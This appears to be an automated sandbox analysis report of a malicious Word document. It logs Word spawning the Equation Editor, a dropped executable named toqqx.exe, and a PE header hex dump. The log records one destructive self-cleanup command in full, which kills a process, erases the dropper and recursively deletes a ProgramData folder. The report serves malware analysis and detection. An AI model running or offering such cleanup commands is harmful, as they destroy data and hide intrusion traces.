                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$NEEE"GL^NElUVA_D2DDRichEPEL8'Y"! @@A H?08@.text `.dataD@.idata@@.rsrc @@.reloc0@B


                                                                Code Manipulations

                                                                Statistics

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Start time:21:33:34
                                                                Start date:04/05/2021
                                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                Wow64 process (32bit):false
                                                                Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                Imagebase:0x13f1e0000
                                                                File size:1424032 bytes
                                                                MD5 hash:95C38D04597050285A18F66039EDB456
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:21:33:53
                                                                Start date:04/05/2021
                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                Imagebase:0x400000
                                                                File size:543304 bytes
                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:21:33:54
                                                                Start date:04/05/2021
                                                                Path:C:\Users\user\toqqx.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\toqqx.exe
                                                                Imagebase:0x1030000
                                                                File size:251192 bytes
                                                                MD5 hash:5753388FBFCDE9E08D00AC9E2BE5D881
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Antivirus matches:
                                                                • Detection: 47%, ReversingLabs
                                                                Reputation:low

                                                                General

                                                                Start time:21:33:56
                                                                Start date:04/05/2021
                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                Imagebase:0x400000
                                                                File size:543304 bytes
                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:21:34:01
                                                                Start date:04/05/2021
                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                Imagebase:0x400000
                                                                File size:543304 bytes
                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:21:34:02
                                                                Start date:04/05/2021
                                                                Path:C:\Users\user\toqqx.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\toqqx.exe
                                                                Imagebase:0x1030000
                                                                File size:251192 bytes
                                                                MD5 hash:5753388FBFCDE9E08D00AC9E2BE5D881
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Reputation:low

                                                                General

                                                                Start time:21:34:03
                                                                Start date:04/05/2021
                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                Imagebase:0x400000
                                                                File size:543304 bytes
                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:21:34:04
                                                                Start date:04/05/2021
                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                Imagebase:0x400000
                                                                File size:543304 bytes
                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:21:34:48
                                                                Start date:04/05/2021
                                                                Path:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                Imagebase:0x1020000
                                                                File size:251192 bytes
                                                                MD5 hash:5753388FBFCDE9E08D00AC9E2BE5D881
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 47%, ReversingLabs
                                                                Reputation:low

                                                                General

                                                                Start time:21:34:56
                                                                Start date:04/05/2021
                                                                Path:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                Imagebase:0x1020000
                                                                File size:251192 bytes
                                                                MD5 hash:5753388FBFCDE9E08D00AC9E2BE5D881
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low

                                                                General

                                                                Start time:21:35:03
                                                                Start date:04/05/2021
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Windows\System32\cmd.exe' /c taskkill /pid 2540 & erase C:\Users\user\AppData\Local\Temp\toqqx.exe & RD /S /Q C:\\ProgramData\\843743064682002\\* & exit
                                                                Imagebase:0x4a080000
                                                                File size:302592 bytes
                                                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:21:35:04
                                                                Start date:04/05/2021
                                                                Path:C:\Windows\SysWOW64\taskkill.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:taskkill /pid 2540
                                                                Imagebase:0xcc0000
                                                                File size:77824 bytes
                                                                MD5 hash:94BDCAFBD584C979B385ADEE14B08AB4
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate

                                                                Disassembly

                                                                Code Analysis

                                                                Reset < >